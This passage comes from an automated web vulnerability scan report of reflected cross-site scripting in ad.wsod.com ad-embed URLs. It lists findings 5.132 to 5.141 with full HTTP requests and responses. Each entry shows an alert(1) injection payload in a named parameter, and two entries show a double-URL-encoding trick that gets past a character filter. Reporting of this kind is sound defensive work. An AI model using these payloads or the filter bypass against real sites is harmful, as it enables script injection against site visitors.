Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1394606125?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488fa01b"-alert(1)-"1b5b12782c4&AN=1394606125&PG=INVSRQ&ASID=0932f0fa7bd044ce92444252d58da2c8 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 01:40:35 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1681

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296351635**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488fa01b"-alert(1)-"1b5b12782c4&AN=1394606125&PG=INVSRQ&ASID=0932f0fa7bd044ce92444252d58da2c8">
...[SNIP]...

5.132. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1394606125 [UIT parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1394606125

Issue detail

The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8921f"-alert(1)-"0ff0bbaf9e4 was submitted in the UIT parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1394606125?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G8921f"-alert(1)-"0ff0bbaf9e4&TargetID=28253488&AN=1394606125&PG=INVSRQ&ASID=0932f0fa7bd044ce92444252d58da2c8 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 01:40:22 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1681

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
/ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296351622**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G8921f"-alert(1)-"0ff0bbaf9e4&TargetID=28253488&AN=1394606125&PG=INVSRQ&ASID=0932f0fa7bd044ce92444252d58da2c8">
...[SNIP]...

5.133. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1394606125 [click parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1394606125

Issue detail

The value of the click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dcba9"-alert(1)-"1c04fc64770 was submitted in the click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1394606125?click=http://g.redacted/_2AD0003L/93000000000038010.1?!dcba9"-alert(1)-"1c04fc64770&&PID=8010639&UIT=G&TargetID=28253488&AN=1394606125&PG=INVSRQ&ASID=0932f0fa7bd044ce92444252d58da2c8 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 01:40:00 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1681

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
rc="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296351600**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.redacted/_2AD0003L/93000000000038010.1?!dcba9"-alert(1)-"1c04fc64770&&PID=8010639&UIT=G&TargetID=28253488&AN=1394606125&PG=INVSRQ&ASID=0932f0fa7bd044ce92444252d58da2c8">
...[SNIP]...

5.134. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1394606125 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1394606125

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6bede"-alert(1)-"9ed5f8f0fb1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1394606125?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=1394606125&PG=INVSRQ&ASID=0932f0fa7bd044ce92444252d58da2c8&6bede"-alert(1)-"9ed5f8f0fb1=1 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 01:42:33 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1684

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=1394606125&PG=INVSRQ&ASID=0932f0fa7bd044ce92444252d58da2c8&6bede"-alert(1)-"9ed5f8f0fb1=1">
...[SNIP]...

5.135. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/842662894 [&PID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/842662894

Issue detail

The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b9a1e"-alert(1)-"0aefbd57b48 was submitted in the &PID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/842662894?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639b9a1e"-alert(1)-"0aefbd57b48&UIT=G&TargetID=28253488&AN=842662894&PG=INVSRQ&ASID=a06ba72a17b94ee896a6f183bcdee2f9 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_1=33:353:516:3:0:38345:1296350886:L|33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L; u=4d2cdd9abba1d; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 14:49:18 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1680

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
oto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296398958**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639b9a1e"-alert(1)-"0aefbd57b48&UIT=G&TargetID=28253488&AN=842662894&PG=INVSRQ&ASID=a06ba72a17b94ee896a6f183bcdee2f9">
...[SNIP]...

5.136. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/842662894 [AN parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/842662894

Issue detail

The value of the AN request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 685ba"-alert(1)-"3346fc71ccf was submitted in the AN parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/842662894?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=842662894685ba"-alert(1)-"3346fc71ccf&PG=INVSRQ&ASID=a06ba72a17b94ee896a6f183bcdee2f9 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_1=33:353:516:3:0:38345:1296350886:L|33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L; u=4d2cdd9abba1d; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 14:50:14 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1680

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
5d7fd7c0fb6e6a631357/353.0.js.120x30/1296399014**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=842662894685ba"-alert(1)-"3346fc71ccf&PG=INVSRQ&ASID=a06ba72a17b94ee896a6f183bcdee2f9">
...[SNIP]...

5.137. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/842662894 [ASID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/842662894

Issue detail

The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c84f4"-alert(1)-"735b0bb387b was submitted in the ASID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/842662894?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=842662894&PG=INVSRQ&ASID=a06ba72a17b94ee896a6f183bcdee2f9c84f4"-alert(1)-"735b0bb387b HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_1=33:353:516:3:0:38345:1296350886:L|33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L; u=4d2cdd9abba1d; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 14:50:32 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1680

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
*;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=842662894&PG=INVSRQ&ASID=a06ba72a17b94ee896a6f183bcdee2f9c84f4"-alert(1)-"735b0bb387b">
...[SNIP]...

5.138. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/842662894 [PG parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/842662894

Issue detail

The value of the PG request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aa884"-alert(1)-"d97069342a2 was submitted in the PG parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/842662894?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=842662894&PG=INVSRQaa884"-alert(1)-"d97069342a2&ASID=a06ba72a17b94ee896a6f183bcdee2f9 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_1=33:353:516:3:0:38345:1296350886:L|33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L; u=4d2cdd9abba1d; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 14:50:23 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1680

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
6e6a631357/353.0.js.120x30/1296399023**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=842662894&PG=INVSRQaa884"-alert(1)-"d97069342a2&ASID=a06ba72a17b94ee896a6f183bcdee2f9">
...[SNIP]...

5.139. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/842662894 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/842662894

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d21a1%2522%253balert%25281%2529%252f%252ff11855debe8 was submitted in the REST URL parameter 2. This input was echoed as d21a1";alert(1)//f11855debe8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357d21a1%2522%253balert%25281%2529%252f%252ff11855debe8/353.0.js.120x30/842662894?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=842662894&PG=INVSRQ&ASID=a06ba72a17b94ee896a6f183bcdee2f9 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_1=33:353:516:3:0:38345:1296350886:L|33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L; u=4d2cdd9abba1d; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 14:51:20 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1680

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357d21a1";alert(1)//f11855debe8/353.0.js.120x30/1296399080**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=842662894&PG=INVSRQ&ASID=a06b
...[SNIP]...

5.140. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/842662894 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/842662894

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4ebba%2522%253balert%25281%2529%252f%252fc747ad1690c was submitted in the REST URL parameter 3. This input was echoed as 4ebba";alert(1)//c747ad1690c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x304ebba%2522%253balert%25281%2529%252f%252fc747ad1690c/842662894?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=842662894&PG=INVSRQ&ASID=a06ba72a17b94ee896a6f183bcdee2f9 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_1=33:353:516:3:0:38345:1296350886:L|33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L; u=4d2cdd9abba1d; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 14:51:25 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1680

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x304ebba";alert(1)//c747ad1690c/1296399085**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=842662894&PG=INVSRQ&ASID=a06ba72a17b94ee896a6
...[SNIP]...

5.141. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/842662894 [TargetID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/842662894

Issue detail

The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aa04f"-alert(1)-"69f6ed3ba42 was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/842662894?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488aa04f"-alert(1)-"69f6ed3ba42&AN=842662894&PG=INVSRQ&ASID=a06ba72a17b94ee896a6f183bcdee2f9 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_1=33:353:516:3:0:38345:1296350886:L|33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L; u=4d2cdd9abba1d; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 14:50:00 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1680

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
